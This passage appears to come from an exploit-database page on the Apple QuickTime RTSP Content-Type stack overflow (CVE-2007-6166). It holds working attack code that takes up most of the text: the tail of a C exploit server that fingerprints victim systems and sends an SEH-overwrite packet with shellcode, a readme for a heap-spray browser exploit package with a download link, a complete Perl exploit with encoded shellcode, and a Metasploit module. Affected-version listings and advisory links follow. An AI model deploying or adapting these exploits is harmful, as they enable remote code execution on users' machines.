    saddr.sin_addr.s_addr = INADDR_ANY;
    saddr.sin_port = htons(port);

    if (bind(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR) {
        printf("Bind Error \r\n");
        closesocket(sock);
        WSACleanup();
        exit(1);
    }

    if((listen(sock, SOMAXCONN)) == SOCKET_ERROR) {
        printf("Listen Error \r\n");
        closesocket(sock);
        WSACleanup();
        exit(1);
    }

    printf("[+] Listening on port: %d\r\n", port);

    if((vicsock = accept(sock, NULL, NULL)) != INVALID_SOCKET) {
        printf("[+]Victim Connected \r\n");
        memset(recvbuf, 0, sizeof(recvbuf));
        recv(vicsock, recvbuf, 512, 0);
        memset(evilbuf, '\0', sizeof(evilbuf));
        strcpy(evilbuf, header_part1);

        /*Identify Operating System - Goes Through Vista, XP and is able to detect Service Patchs so mod at will*/
        /* The version strings are searched for in the client's own request (its User-Agent line). */
        if((strptr = strstr(recvbuf, "6.0")) != NULL) { // Vista
            strptr = NULL;
            if((strptr = strstr(recvbuf, "7.3")) != NULL) {
                printf("Victim is running Vista and QKTime Version 7.3\r\n");
                pos = strlen(header_part1);
                for(i = 1; i <= 991; i++) {
                    evilbuf[pos] = 'A';
                    pos++;
                }
                strcat(evilbuf, "\xeb\x32\x90\x90");
                strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
                pos += 8;
            }
            else {
                strptr = NULL;
                if((strptr = strstr(recvbuf, "7.2")) != NULL) {
                    printf("Victim is running Vista and QKTime Version 7.2\r\n");
                    pos = strlen(header_part1);
                    for(i = 1; i <= 987; i++) {
                        evilbuf[pos] = 'A';
                        pos++;
                    }
                    strcat(evilbuf, "\xeb\x32\x90\x90");
                    strcat(evilbuf, "\xb4\x45\x59\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
                    pos += 8;
                }
            }
        }
        else { //Win XP SP2
            strptr = NULL;
            if((strptr = strstr(recvbuf, "5.1")) != NULL) {
                strptr = NULL;
                if((strptr = strstr(recvbuf, "Pack 2")) != NULL) {
                    strptr = NULL;
                    if((strptr = strstr(recvbuf, "7.3")) != NULL) {
                        printf("Victim is running XP SP2 and QKTime Version 7.3\r\n");
                        pos = strlen(header_part1);
                        for(i = 1; i <= 991; i++) {
                            evilbuf[pos] = 'A';
                            pos++;
                        }
                        strcat(evilbuf, "\xeb\x32\x90\x90");
                        strcat(evilbuf, "\x54\x49\x64\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
                        pos += 8;
                    }
                    else {
                        strptr = NULL;
                        if((strptr = strstr(recvbuf, "7.2")) != NULL) {
                            printf("Victim is running XP SP2 and QKTime Version 7.2\r\n");
                            pos = strlen(header_part1);
                            for(i = 1; i <= 987; i++) {
                                evilbuf[pos] = 'A';
                                pos++;
                            }
                            strcat(evilbuf, "\xeb\x32\x90\x90");
                            strcat(evilbuf, "\xb4\x45\x59\x67"); //pop ebx-pop-retbis in QuickTimeStreaming.gtx
                            pos += 8;
                        }
                    }
                }
            }
            else {
                printf("[-] Not a Valid Target, Shutting Down");
                closesocket(vicsock);
                closesocket(sock);
                WSACleanup();
                exit(1);
            }
        }

        /* NOP sled, shellcode, then NOP padding out to 4096 bytes after the SEH overwrite */
        for(i = 0; i < 200; i++) {
            evilbuf[pos] = '\x90';
            pos++;
        }
        for(i = 0; i < strlen(scode); i++) {
            evilbuf[pos] = scode[i];
            pos++;
        }
        int rest = 4096 - (200 + strlen(scode));
        for(i = 0; i < rest; i++) {
            evilbuf[pos] = '\x90';
            pos++;
        }
        strcat(evilbuf, "\r\n");
        pos += 2;
        for(i = 0; i < sizeof(header_part2); i++) {
            evilbuf[pos] = header_part2[i];
            pos++;
        }
        strcat(evilbuf, contentlength);
        strcat(evilbuf, "\r\n");
        Sleep(1);
        strcat(evilbuf, "\r\n");
        pos += 8;
        strcat(evilbuf, body);

        printf("%s", evilbuf);
        printf("[+] Evil Packet Generated \r\n");

        if(send(vicsock, evilbuf, strlen(evilbuf), 0) != SOCKET_ERROR)
            printf("[+] Evil Packet Sent \r\n");
        else
            printf("[-] Evil Packet Sending Failed \r\n");

        closesocket(vicsock);
        closesocket(sock);
        WSACleanup();
    }
    else {
        printf("Accept failed");
        closesocket(sock);
        WSACleanup();
    }
    return 0;
}

int info()
{
    printf("[+]Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit\r\n");
    printf("[+]Author: InTeL\r\n");
    printf("[+]Tested on:\r\n\t- Quicktime 7.3 on Windows Vista, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows Vista, Result: SEH Overwrite. Code Exec\r\n\t- Quicktime 7.3 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n\t- Quicktime 7.2 on Windows XP Pro SP2, Result: SEH Overwrite, Code Exec\r\n");
    printf("[+]Shout to: UIA, you kno who u ppl are\r\n\r\n");
    return 0;
}

// milw0rm.com [2007-11-24]
Exploit Database EDB-ID : 4664

Publication date : 2007-11-26 23h00 +00:00
Author : YAG KOHHA
EDB Verified : Yes

 ___                  Everyone Loves
O|0_+|O               the Hypnotoad...
 |...|
 | |
=o0O=====O0o===============================
| QuickTime RTSP Response Content-type    |
| remote stack rewrite exploit for IE 6/7 |
| by Yag Kohha (skyhole [at] gmail.com)   |
===========================================

Exploit tested on:
- Windows Vista
- Windows XP SP2
- IE 6.0/ 7.0
- QT 7.2/ 7.3

Exploit requirements:
Target: Windows Vista/ XP SP2, IE 6.0/7.0, QT 7.2/7.3
Server: Linux, Perl, Apache web-server

What's inside:
index.html - hypertext document with heap spray javascript and QT plugin call with playlist.mov (place to public web-folder)
server - rtsp-server emulator (run in your linux shell in background mode "./server&")
playlist.mov - play list with rtsp server link (edit "_server_emulator_ip" with address of rtsp-server emulator started and place to public web-folder)

Try to load index.html in your browser from remote web-server with installed exploit.

Greetz 2:
- str0ke & milw0rm
- shinnai
- h07 for bug publication
- muts & InTel for code play'ng ( but guyz, U`rs releases coded with SEH overwrite... It's so many problems with shellcode modification and stable exploitation on different systems... for whats? We can overwrite EIP with buffer generation like 65535 bytes. In this release EIP -> 0x0c0c0c0c )

Fuckz 2:
- wslabi.com (too stupid resource for selling shit)
- ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz)

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz)

# milw0rm.com [2007-11-27]
Exploit Database EDB-ID : 11027

Publication date : 2010-01-05 23h00 +00:00
Author : jacky
EDB Verified : Yes

# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [download link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :

#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <[email protected]>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!

#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler

use strict;
use Socket;

my $junk = "A" x 991;
my $nseh = "\xeb\x06\x90\x90";      # short jmp over the handler address into the NOPs
my $seh  = "\x4e\x28\x86\x66";      #\x4e\x28\x86\x66
my $nops = "\x90" x 20;
my $shellcode =
    "\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
    "\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" .
    "\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" .
    "\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" .
    "\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" .
    "\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" .
    "\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" .
    "\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" .
    "\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" .
    "\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" .
    "\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" .
    "\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" .
    "\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" .
    "\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" .
    "\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" .
    "\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" .
    "\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" .
    "\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" .
    "\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" .
    "\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" .
    "\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" .
    "\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" .
    "\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" .
    "\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" .
    "\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" .
    "\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" .
    "\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" .
    "\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" .
    "\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" .
    "\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";
my $rest = "B" x (4096 - length($seh . $nops . $shellcode));
my $payload = $junk . $nseh . $seh . $nops . $shellcode . $rest;

my $header = "RTSP/1.0 200 OK\r\n" .
    "CSeq: 1\r\n" .
    "Date: 0x00 :P\r\n" .
    "Content-Base: rtsp://0.0.0.0/1.mp3/\r\n" .
    "Content-Type: $payload\r\n" .
    "Content-Length: 334\r\n" .
    "\r\n";

my $body = "v=0\r\n" .
    "o=- 16689332712 1 IN IP4 0.0.0.0\r\n" .
    "s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n" .
    "i=1.mp3\r\n" .
    "t=0 0\r\n" .
    "a=tool:ciamciaramcia\r\n" .
    "a=type:broadcast\r\n" .
    "a=control:*\r\n" .
    "a=range:npt=0-213.077\r\n" .
    "a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n" .
    "a=x-qt-text-inf:1.mp3\r\n" .
    "m=audio 0 RTP/AVP 14\r\n" .
    "c=IN IP4 0.0.0.0\r\n" .
    "a=control:track1\r\n";

my $evil = $header . $body;

my $port = shift || 554;
my $proto = getprotobyname('tcp');
socket(SERVER, PF_INET, SOCK_STREAM, $proto);
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SERVER, $paddr);
listen(SERVER, SOMAXCONN);
print "[+]Listening on [RTSP]554\n";

my $client_addr;
while($client_addr = accept(CLIENT, SERVER)) {
    print CLIENT $evil;
    print "[+]Connection Accepted\n";
    print "[+]Sending Evil Payload\n";
}
close CLIENT;
print "[+]Connection closed\n";
Exploit Database EDB-ID : 16424

Publication date : 2010-05-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: apple_quicktime_rtsp_response.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Apple QuickTime 7.3.
        By sending an overly long RTSP response to a client, an attacker may be
        able to execute arbitrary code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9262 $',
      'References'     =>
        [
          [ 'CVE', '2007-6166' ],
          [ 'OSVDB', '40876' ],
          [ 'BID', '26549' ],
          [ 'URL', 'http://milw0rm.com/exploits/4648' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 700,
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'MaxNops'  => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ], # pop esi; pop ebx; ret / QuickTimeStreaming.qtx (7.3.0.70)
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 23 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ])
      ], self.class)
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    client.get_once

    # 991 bytes of filler, jmp short over the handler address, pop/pop/ret, payload,
    # then padding so the header stays about 5 KB long like the original PoC
    buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
    buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length)

    strname = rand_text_alpha(rand(75) + 1)
    date    = Time.now
    num     = rand(1).to_s

    header  = "RTSP/1.0 200 OK\r\n"
    header << "CSeq: 1\r\n"
    header << "Date: #{date}\r\n"
    header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n"
    header << "Content-Type: #{buffer}\r\n"
    header << "Content-Length: #{strname.length}\r\n\r\n"

    body  = "v=#{num}\r\n"
    body << "o=#{strname}\r\n"
    body << "s=#{strname}\r\n"
    body << "i=#{strname}\r\n"
    body << "t=#{num}\r\n"
    body << "a=tool:#{strname}\r\n"
    body << "a=type:#{strname}\r\n"
    body << "a=control:#{strname}\r\n"
    body << "a=range:#{strname}\r\n"
    body << "a=x-qt-text-nam:#{strname}\r\n"
    body << "a=x-qt-text-inf:#{strname}\r\n"
    body << "m=#{strname}\r\n"
    body << "c=#{strname}\r\n"
    body << "a=control:#{strname}\r\n"

    sploit = header + body

    print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
    client.put(sploit)

    handler(client)
    service.close_client(client)
  end

end

Products Mentioned

Configuration 0

Apple>>Quicktime >> Version To (including) 7.3

Apple>>Quicktime >> Version -

Apple>>Quicktime >> Version 3.0

Apple>>Quicktime >> Version 4.1.2

Apple>>Quicktime >> Version 5.0

Apple>>Quicktime >> Version 5.0.1

Apple>>Quicktime >> Version 5.0.2

Apple>>Quicktime >> Version 6.0

Apple>>Quicktime >> Version 6.1

Apple>>Quicktime >> Version 6.5

Apple>>Quicktime >> Version 6.5.1

Apple>>Quicktime >> Version 6.5.2

Apple>>Quicktime >> Version 7.0

Apple>>Quicktime >> Version 7.0.1

Apple>>Quicktime >> Version 7.0.2

Apple>>Quicktime >> Version 7.0.3

Apple>>Quicktime >> Version 7.0.4

Apple>>Quicktime >> Version 7.1

Apple>>Quicktime >> Version 7.1.1

Apple>>Quicktime >> Version 7.1.2

Apple>>Quicktime >> Version 7.1.3

Apple>>Quicktime >> Version 7.1.4

Apple>>Quicktime >> Version 7.1.5

Apple>>Quicktime >> Version 7.1.6

Apple>>Quicktime >> Version 7.2

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_xp >> Version *

Configuration 0

Apple>>Safari >> Version *

Apple>>Mac_os_x >> Version 10.3.9

Apple>>Mac_os_x >> Version 10.4.9

Apple>>Mac_os_x >> Version 10.5

Apple>>Mac_os_x >> Version 10.5.0

Apple>>Mac_os_x >> Version 10.5.1

Apple>>Mac_os_x >> Version 10.5.2

Apple>>Mac_os_x >> Version 10.5.3

Apple>>Mac_os_x >> Version 10.5.4

Apple>>Mac_os_x >> Version 10.5.5

Apple>>Mac_os_x >> Version 10.5.6

Apple>>Mac_os_x >> Version 10.5.7

Apple>>Mac_os_x >> Version 10.5.8

References

http://www.securityfocus.com/bid/26549
Tags : vdb-entry, x_refsource_BID
http://securityreason.com/securityalert/3410
Tags : third-party-advisory, x_refsource_SREASON
https://www.exploit-db.com/exploits/4648
Tags : exploit, x_refsource_EXPLOIT-DB
http://security.gentoo.org/glsa/glsa-200803-08.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.securityfocus.com/bid/26560
Tags : vdb-entry, x_refsource_BID
http://www.us-cert.gov/cas/techalerts/TA07-334A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/659761
Tags : third-party-advisory, x_refsource_CERT-VN
https://www.exploit-db.com/exploits/6013
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.vupen.com/english/advisories/2007/3984
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/27755
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29182
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1018989
Tags : vdb-entry, x_refsource_SECTRACK